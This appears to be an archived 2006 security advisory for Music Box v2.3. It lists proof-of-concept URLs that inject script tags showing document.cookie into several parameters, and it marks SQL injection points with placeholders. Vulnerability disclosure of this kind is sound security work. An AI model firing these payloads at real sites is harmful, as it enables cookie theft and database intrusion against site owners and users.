musicBoxXSS.txt

musicBoxXSS.txt: Posted Apr 1, 2006; Authored by Linux_Drox | Site lezr.com; Music Box version 2.3 is susceptible to SQL injection and cross site scripting flaws.; tags | exploit, xss, sql injection; SHA-256 | 1634d8569b5744a5debb98c3739b1e71f042c07ea759bb7cbad9237a99eace75; Download | Favorite | View

musicBoxXSS.txt

Hello
Vulnerable: Music Box v2.3
http://www.MusicboxV2.com

Exploit :
XSS :
http://example.com/music/index.php?id='><script>alert(document.cookie)</script>

http://example.com/music/index.php?action=top&show=5&type='><script>alert(document.cookie)</script>

http://example.com/music/index.php?action=top&show='><script>alert(document.cookie)</script>&type=Artists

http://example.com/music/cart/cart.php?message1='><script>alert(document.cookie)</script>

http://example.com/music/cart/cart.php?message='><script>alert(document.cookie)</script>

SQL :
http://example.com/music/index.php?action=top&show=5&type=[SQL]

http://example.com/music/index.php?action=top&show=[SQL]&type=Artists


Discovery by Linux_Drox

http://www.lezr.com

Best Regards ,,

Top Authors In Last 30 Days

Red Hat 239 files
Ubuntu 58 files
Debian 20 files
LiquidWorm 19 files
Apple 9 files
Gentoo 5 files
Google Security Research 4 files
Alter Prime 3 files
Chokri Hammedi 3 files
nu11secur1ty 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,862)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,265)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,976)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

musicBoxXSS.txt

musicBoxXSS.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

musicBoxXSS.txt

Share This

musicBoxXSS.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems